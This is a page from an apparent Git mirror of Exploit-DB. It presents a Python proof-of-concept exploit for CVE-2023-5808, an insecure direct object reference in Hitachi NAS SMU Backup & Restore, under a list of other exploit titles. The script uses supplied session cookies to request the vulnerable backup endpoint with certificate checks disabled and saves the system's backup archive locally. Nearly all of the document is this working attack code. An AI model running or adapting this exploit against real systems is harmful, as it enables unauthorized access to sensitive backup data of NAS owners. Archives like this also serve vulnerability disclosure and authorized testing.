bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/51872.py
Exploit-DB ce58678266 DB: 2024-03-12 
7 changes to exploits/shellcodes/ghdb

Sitecore - Remote Code Execution v8.2

Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore < 14.8.7825.01 - IDOR

Adobe ColdFusion versions 2018_15 (and earlier) and 2021_5 and earlier - Arbitrary File Read

WordPress Plugin Duplicator < 1.5.7.1 - Unauthenticated Sensitive Data Exposure to Account Takeover

Microsoft Windows Defender / Trojan.Win32/Powessere.G - Detection Mitigation Bypass
2024-03-12 00:16:25 +00:00

87 lines
No EOL
2.8 KiB
Python
Executable file
Raw Permalink Blame History

#!/usr/bin/python3
#
# Title: Hitachi NAS (HNAS) System Management Unit (SMU) Backup & Restore IDOR Vulnerability
# CVE: CVE-2023-5808
# Date: 2023-12-13
# Exploit Author: Arslan Masood (@arszilla)
# Vendor: https://www.hitachivantara.com/
# Version: < 14.8.7825.01
# Tested On: 13.9.7021.04
import argparse
from datetime import datetime
from os import getcwd
import requests
parser = argparse.ArgumentParser(
description="CVE-2023-5808 PoC",
usage="./CVE-2023-5808.py --host <Hostname/FQDN/IP> --id <JSESSIONID> --sso <JSESSIONIDSSO>"
)
# Create --host argument:
parser.add_argument(
"--host",
required=True,
type=str,
help="Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443"
)
# Create --id argument:
parser.add_argument(
"--id",
required=True,
type=str,
help="JSESSIONID cookie value"
)
# Create --sso argument:
parser.add_argument(
"--sso",
required=True,
type=str,
help="JSESSIONIDSSO cookie value"
)
args = parser.parse_args()
def download_file(hostname, jsessionid, jsessionidsso):
# Set the filename:
filename = f"smu_backup-{datetime.now().strftime('%Y-%m-%d_%H%M')}.zip"
# Vulnerable SMU URL:
smu_url = f"https://{hostname}/mgr/app/template/simple%2CBackupSmuScreen.vm/password/"
# GET request cookies
smu_cookies = {
"JSESSIONID": jsessionid,
"JSESSIONIDSSO": jsessionidsso
}
# GET request headers:
smu_headers = {
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate",
"Dnt": "1",
"Referer": f"https://{hostname}/mgr/app/action/admin.SmuBackupRestoreAction/eventsubmit_doperform/ignored",
"Upgrade-Insecure-Requests": "1",
"Sec-Fetch-Dest": "document",
"Sec-Fetch-Mode": "navigate",
"Sec-Fetch-Site": "same-origin",
"Sec-Fetch-User": "?1",
"Te": "trailers",
"Connection": "close"
}
# Send the request:
with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:
with open(filename, 'wb') as backup_archive:
# Write the zip file to the CWD:
backup_archive.write(file_download.content)
print(f"{filename} has been downloaded to {getcwd()}")
if __name__ == "__main__":
download_file(args.host, args.id, args.sso)
Reference in a new issue View git blame Copy permalink